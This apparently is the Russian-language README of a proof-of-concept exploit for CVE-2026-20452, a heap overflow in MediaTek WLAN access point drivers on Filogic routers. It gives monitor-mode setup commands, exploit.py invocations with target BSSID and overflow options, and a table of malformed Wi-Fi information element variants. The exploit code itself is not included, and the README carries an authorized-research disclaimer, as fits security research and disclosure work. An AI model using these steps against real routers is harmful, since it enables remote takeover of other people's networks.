
PoC-эксплойт для CVE-2026-20452 — переполнение буфера в куче в драйверах WLAN AP от MediaTek. Использует scapy для отправки специально сформированных управляющих кадров Wi-Fi с целью удалённого выполнения кода на уязвимых маршрутизаторах Filogic.
Эксплойт Proof of Concept для CVE-2026-20452 — переполнение буфера в куче в драйвере точки доступа WLAN MediaTek.
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
Этот инструмент предоставляется только для авторизованных исследований в области безопасности и образовательных целей. Передача сигналов на Wi-Fi частотах может требовать юридического разрешения в вашей юрисдикции. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых не имеете явного разрешения, незаконно. Авторы не несут ответственности и не отвечают за любое неправомерное использование или ущерб, причинённый этим инструментом.
| Вариант | Тип IE | Описание |
|---|
| 0 | Vendor Specific (221) | Один сверхбольшой IE с OUI 00:50:43 |
| 1 | Chained Vendor IEs | Несколько небольших IE для повреждения соседних объектов кучи |
| 2 | HT Capabilities (45) | Сверхбольшой IE HT Capabilities |
| 3 | Extended Capabilities (127) | Сверхбольшой IE Extended Capabilities |